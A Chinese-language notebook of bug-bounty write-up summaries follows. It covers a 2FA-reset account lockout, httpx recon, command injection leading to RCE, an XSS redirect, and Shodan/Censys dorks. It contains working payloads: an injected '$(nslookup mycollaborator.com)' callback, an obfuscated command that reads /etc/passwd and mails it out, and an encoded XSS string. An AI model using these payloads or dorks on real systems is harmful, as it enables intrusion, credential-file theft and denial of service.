随手记

一、使用重置2FA 功能可能对 Hackerone 的用户帐户进行潜在的 DOS 攻击

1. 在“重置双因素身份验证”使用 burp suite 拦截请求，攻击者将拦截的请求发送给“入侵者”，并将电子邮件替换为“受害者的电子邮件”，并在“密码”字段中设置暴力负载。
2. 暴力攻击将锁定受害者帐户，并且由于没有速率限制，暴力攻击将成功运行（无限次）锁定受害者，从而拒绝共同黑客访问或解锁他/她的 hacekrone 帐户。

二、我的第一个 Bug 是通过 SQL 注入进行 RCE！

1. 收集所有活动域并使用 httpx 对其进行屏幕截图

   httpx -l allDomains.txt -o liveDomains.txt 
   收集存活域名
   httpx -l liveDomains.txt -srd subsScreens -ss
   输出图像到 subsScreens 目录下
   

三、后端参数注入 --> RCE

1. CalcTool 代码审查 发现命令注入漏洞

   margs = "-s CalcTool Output: '" + jobtitle + "' " + email + " < LOGFILE"
   System ("mail" + text)
   这些字符串操作的最终结果是以下命令：
   mail -s 'CalcTool Output: job173' [email protected] < /path/to/LOGFILE
   

2. 传参污染

   -------------------------384837281
   Content-Disposition: form-data; name="frequency"
   
   10
   Title "$(nslookup mycollaborator.com)"
   -------------------------384837281
   

3. 构造命令执行 payload

   mail -s "CalcTool Output: `a=ca;b=t;$a$b /e*c/pa*s*d > /tmp/synack77`" [email protected] < /tmp/synack77
   
   反引号内的命令在运行 mail 命令之前执行。因此，在 mail 命令运行之前，命令的输出将存储在 /tmp/synack77 中，并且我们会收到一封包含命令结果的电子邮件。在本例中，我们正在读取 /etc/passwd。
   

四、一个独特的 500 美元 XSS

1. 信息搜集发现一个这样的链接：<https://account.target.com/login?redirect=https://api.target.com/file?param={"data":"<h1>"}>
2. 可以构造 xss：<%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)><!—
3. 完整 payload：<https://account.target.com/login?redirect=https://api.target.com/file?param={"data":"<%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)><!--"}。>

五、30000 美元的赏金事件

1. dork

   censys:services.software.product=`jenkins`
   shodan:Set-Cookie: mongo-express=" "200 OK"